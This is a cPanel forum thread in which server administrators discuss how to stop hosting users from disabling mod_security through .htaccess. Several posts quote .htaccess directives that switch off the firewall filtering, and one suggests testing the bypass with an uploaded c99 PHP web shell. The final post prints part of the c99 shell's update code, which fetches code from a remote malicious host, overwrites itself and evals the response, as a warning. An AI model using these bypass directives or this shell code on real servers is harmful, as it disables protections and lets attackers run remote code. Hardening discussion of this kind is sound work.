The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How to disable overriding mod_security config via .htaccess

Discussion in 'Security' started by voshka, Jul 14, 2012.

  1. voshka

    voshka Active Member

    Joined:
    Apr 4, 2010
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    Hi

    if a user wanted to break the server he could easily bypass the rules by easily opening a .htaccess and
    write the following into it
    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>

    or maybe a hacker could bypass it too

    so it is wise to disable the overriding functionality by user access

    I have searched a lot and found out the way that is
    /usr/local/apache/bin/apxs -D DISABLE_HTACCESS_CONFIG -cia mod_security.c

    I could be able to compile it with some of the mod_security.c that related to 1.9.5 version
    but as it was too old some errors occurred

    Syntax error on line 10 of /usr/local/apache/conf/modsec2.user.conf:
    Invalid parts specification for SecAuditLogParts: ABIFHZ
    httpd not running, trying to start
    [root@box1 modsec_rules]# nano /usr/local/apache/conf/modsec2.user.conf

    I tried recompiling with the latest 2.6.6 but it get compilation errors


    So my question is that is it possible to just compile what wasyapache has done with disabling the .htaccess module or I have to reinstall and compile modsecurity by hand from the first and i wanted some guide and instructions on version 2.6.6

    Thanks
     
  2. NetMantis

    NetMantis BANNED

    Joined:
    Apr 22, 2012
    Messages:
    117
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Utah
    cPanel Access Level:
    DataCenter Provider
    I generally first setup mod_security with EasyApache and the manually recompile and install mod_security over and replacing the Cpanel installation patched instead to disallow .htaccess overrides.

    It would be very nice if Cpanel had that setup in EasyApache by default but at this time that's how I have to do it.

    If you want to be particularly nasty, you could write a quick simple script to grep all the .htaccess files for "SecFilterEngine" or "mod_security.c" and automatically suspend any accounts where it is found.
     
  3. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    If a hacker already had access to the account, there would be no need at that point to disable mod_security for the account by the hacker. If you have a foot in the door, you don't then start drilling extra holes in that door to get in when you are already inside the house.

    The only reason a site owner might do it would be because the rules being used are impacting a page or pages displaying, and then most users wouldn't be aware of how to even do it.

    If you would like to see this option available, it would be best to post a feature request to change the configuration option:

    Feature Requests for cPanel & WHM
     
  4. voshka

    voshka Active Member

    Joined:
    Apr 4, 2010
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    for finding all I used

    find /home2 -type f -name ".htaccess" -print0 | xargs -0 grep -l "SecFilterScanPOST"

    this will all .htacceses that contains SecFilterScanPOST

    the thing is that we dont want allowing users to manually edit .htaccesses that allow hackers intrude the system
    it is not the hacker that could be able to change .htaccess

    Thanks

    - - - Updated - - -

    @NetMantis
    could you please provide me details of how to implement this?

    Thanks
     
  5. NetMantis

    NetMantis BANNED

    Joined:
    Apr 22, 2012
    Messages:
    117
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Utah
    cPanel Access Level:
    DataCenter Provider
    You very clearly missed the whole point entirely! :)

    We aren't talking about hackers or anyone already hacking the accounts.

    We are discussing preventing a security vulnerability from being opened that could lead to hacking.

    What I was talking about doing above was auto suspended users who attempt to bypass mod_security not as a means of making anything more secure (I already have it locked out physically impossible to do that anyway) but rather to get the immediate undivided attention of any user who tries to do so!

    With the .htaccess options disabled in the compile for mod_security, the user couldn't do anything anyway but I want them to know that they should not be trying to disable it and that I know that they made the attempt to do so!

    It would seem that voshka understood the whole exact point precisely! :)

    Sure, no problem! I'll shoot you over a private message with my contact info and we can get together on this.

    I'll be out and about most of the day today after this morning but I should be back this evening and will also be around all day long tomorrow so whenever you can catch up to me on that, I'd be happy to give you a hand.
     
  6. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    Again, if this is important to you, you would want to open up a feature request. You might link to it in this thread if you've done so for others who run into the topic to post onto that feature request.
     
  7. borgia

    borgia Member

    Joined:
    Jun 27, 2012
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Yeah right, Mod_security 2 cannot be disabled from .htaccess.
    (only from httpd.conf).

    So relax....
     
    #7 borgia, Jul 15, 2012
    Last edited: Jul 15, 2012
  8. voshka

    voshka Active Member

    Joined:
    Apr 4, 2010
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    it actually can
    Please make a test and put this into one of the domains .htaccess and upload and test a shell in that directo

    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>

    or

    <IfModule mod_security2.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>
     
  9. borgia

    borgia Member

    Joined:
    Jun 27, 2012
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    I am sorry what do you mean by "test a shell in that directory" ? I tested in browser and everything is working, mod_security wasn't disabled.

    Regards
     
  10. voshka

    voshka Active Member

    Joined:
    Apr 4, 2010
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    I mean to upload a php shell let say c99 php shell or the rest
    put that in the .htaccess and then use your brwoser to point to that php shell
    it must be working if you pt that in .htaccess
    and this disable all the mod_Security analyzing and filtering features

    Thanks
     
  11. borgia

    borgia Member

    Joined:
    Jun 27, 2012
    Messages:
    12
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    I didn't test with that, I am using something else for those php shell to be automatically removed in the upload moment. But you can restrict those PHP shell to run only in user directory (open_basedir in your custom php.ini for each virtual host). So will be no harm for your server


    Regards
     
    #11 borgia, Jul 15, 2012
    Last edited: Jul 15, 2012
  12. voshka

    voshka Active Member

    Joined:
    Apr 4, 2010
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    Hi

    I have already created a feature request for the main request of this thread
    but I believe it has something to do with the mod_security itself to have disable module available in mod_security 2.6.6
    Please if any body knows a fix help me to prevent disabling mod security using .htaccess

    what CPanel Staff mentioned above is to some what true but a user could purchase service and his/her intention is to harm and easily disable mod security using .htaccess and harm the server
    please help me

    Thanks
     
  13. d'argo

    d'argo Active Member

    Joined:
    Jul 4, 2012
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    Root Administrator
    you cant disable modsec 2.6.6 via .htaccess. these arent even 2.x directives:

    SecFilterEngine Off
    SecFilterScanPOST Off

    are you sure you arent talking bout an earlier version of modsec?
     
  14. CharlesBoyd

    CharlesBoyd Member

    Joined:
    May 29, 2012
    Messages:
    10
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Don't test with the C99 shell, most variants I have seen will automatically make connections and download updates from a remote (obviously malicious) server.

    A typical example:

    PHP:
    $updatenow FALSE//If TRUE, update now (this variable will be FALSE) 

    $c99sh_updateurl "http://crapsite.ru/update/c99shell/"//Update server 
    $c99sh_sourcesurl "http://crapsite.ru/files/c99sh_sources/"//Sources-server 
    Here is the update function:

    PHP:
    if (!function_exists("c99sh_getupdate")) 

    function 
    c99sh_getupdate($update TRUE

    $url $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"
    $data = @file_get_contents($url); 
    if (!
    $data) {return "Can't connect to update-server!";} 
    else 

      
    $data ltrim($data); 
      
    $string substr($data,3,ord($data{2})); 
      if (
    $data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
      if (
    $data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
      if (
    $data{0} == "\x99" and $data{1} == "\x03"
      { 
       
    $string explode("\x01",$string); 
       if (
    $update
       { 
        
    $confvars = array(); 
        
    $sourceurl $string[0]; 
        
    $source file_get_contents($sourceurl); 
        if (!
    $source) {return "Can't fetch update!";} 
        else 
        { 
         
    $fp fopen(__FILE__,"w"); 
         if (!
    $fp) {return "Local error: can't write update to ".__FILE__."!
                        You may download c99shell.php manually 
                        <a href=\""
    .$sourceurl."\"><u>here</u></a>.";} 
         else {
    fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
        } 
       } 
       else {return 
    "New version are available: ".$string[1];} 
      } 
      elseif (
    $data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
      else {return 
    "Error in protocol: segmentation failed! (".$data.") ";} 


    }
    Whatever gets downloaded in this update is probably not something you want.

    There are better ways to do this....
     
    #14 CharlesBoyd, Sep 6, 2012
    Last edited by a moderator: Sep 7, 2012
Loading...

Share This Page